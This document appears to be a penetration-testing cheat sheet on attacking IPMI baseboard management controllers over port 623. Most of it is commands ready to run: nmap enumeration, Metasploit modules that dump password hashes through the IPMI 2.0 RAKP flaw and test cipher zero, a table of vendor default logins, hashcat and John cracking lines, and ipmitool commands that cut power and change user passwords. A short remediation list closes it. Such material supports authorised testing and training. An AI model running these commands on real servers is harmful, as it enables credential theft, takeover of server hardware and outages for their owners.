IPMI (Port 623) Exploit Intelligent Platform Management Interface (IPMI) to gain remote hardware control and retrieve password hashes. IPMI provides out-of-band management for servers, allowing remote power control, BIOS access, and system monitoring even when the OS is down.
Quick Reference Check IPMI Version sudo nmap -sU -p 623 --script ipmi-version 10.10.10.10
Dump Password Hashes use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS 10.10.10.10run
Enumeration Nmap sudo nmap -sU -p 623 --script ipmi-version 10.10.10.10sudo nmap -sU -p 623 --script ipmi-cipher-zero 10.10.10.10
use auxiliary/scanner/ipmi/ipmi_version set RHOSTS 10.10.10.0/24run
Default Credentials Common Vendor Defaults
Vendor
Username
Password
Dell iDRAC
root
calvin
HP iLO
Administrator
Randomized 8-char string
Supermicro IPMI
ADMIN
ADMIN
IBM IMM
USERID
PASSW0RD (with zero)
Fujitsu iRMC
admin
admin
Oracle/Sun ILOM
root
changeme
ASUS iKVM BMC
admin
admin
Test Default Credentials ipmitool -I lanplus -H 10.10.10.10 -U root -P calvin user list use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS 10.10.10.10set USER_FILE users.txtset PASS_FILE passwords.txtrun
IPMI 2.0 RAKP Authentication Bypass Dump Password Hashes (No Authentication Required) use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS 10.10.10.10set OUTPUT_JOHN_FILE ipmi_hashes.johnset OUTPUT_HASHCAT_FILE ipmi_hashes.hashcatrun
Crack Retrieved Hashes Hashcat hashcat -m 7300 ipmi_hashes.hashcat /usr/share/wordlists/rockyou.txt hashcat -m 7300 ipmi_hashes.hashcat -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
John the Ripper john --wordlist=/usr/share/wordlists/rockyou.txt ipmi_hashes.john
Basic Commands ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin chassis status ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin user list ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin sensor list ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin sel list
Power Control ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin power status ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin power on ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin power off ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin power cycle ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin power reset
User Management ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin user list ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin user set password 2 newpassword ipmitool -I lanplus -H 10.10.10.10 -U admin -P admin user enable 2
Exploitation Impact What Attackers Can Do
Power off, reboot, or control server remotely
Access BIOS and boot settings
Mount virtual media (ISO files)
Access system console
Monitor hardware sensors
Retrieve system logs
Modify user accounts
Change network settings
IPMI Hash Dumper use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS 10.10.10.0/24set THREADS 256set OUTPUT_HASHCAT_FILE ipmi.hashcatrun
IPMI Cipher Zero use auxiliary/scanner/ipmi/ipmi_cipher_zero set RHOSTS 10.10.10.10run
Common Workflow Full IPMI Assessment sudo nmap -sU -p 623 --script ipmi-version 10.10.10.0/24msfconsole use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS 10.10.10.10set OUTPUT_HASHCAT_FILE ipmi.hashcatrun hashcat -m 7300 ipmi.hashcat /usr/share/wordlists/rockyou.txt ipmitool -I lanplus -H 10.10.10.10 -U root -P calvin user list ipmitool -I lanplus -H 10.10.10.10 -U root -P calvin chassis status ipmitool -I lanplus -H 10.10.10.10 -U root -P calvin user list ipmitool -I lanplus -H 10.10.10.10 -U root -P calvin sel list
Notes IPMI 2.0 RAKP Vulnerability:
Allows retrieving password hashes without authentication
Affects IPMI 2.0 implementations
Hashes can be cracked offline
No authentication required to dump hashes
Vendor patches may not fix this fundamental protocol flaw
Security Considerations:
IPMI provides complete hardware control
Often uses default credentials
Typically on separate management network
May be accessible from internet if misconfigured
Compromise gives attacker physical-level access
Common Misconfigurations:
Default credentials not changed
IPMI exposed to internet
Weak passwords
No network segmentation
Cipher zero enabled
Anonymous access allowed
BMC Implementations:
Dell iDRAC (Integrated Dell Remote Access Controller)
HP iLO (Integrated Lights-Out)
Supermicro IPMI
IBM IMM (Integrated Management Module)
Fujitsu iRMC (Integrated Remote Management Controller)
Attack Surface:
Password hash retrieval (RAKP)
Default credentials
Weak passwords
Cipher zero vulnerability
Network exposure
Outdated firmware
Remediation:
Change default credentials immediately
Use strong, unique passwords
Restrict IPMI to management network
Disable cipher zero
Update firmware regularly
Monitor IPMI access logs
Use VPN for remote access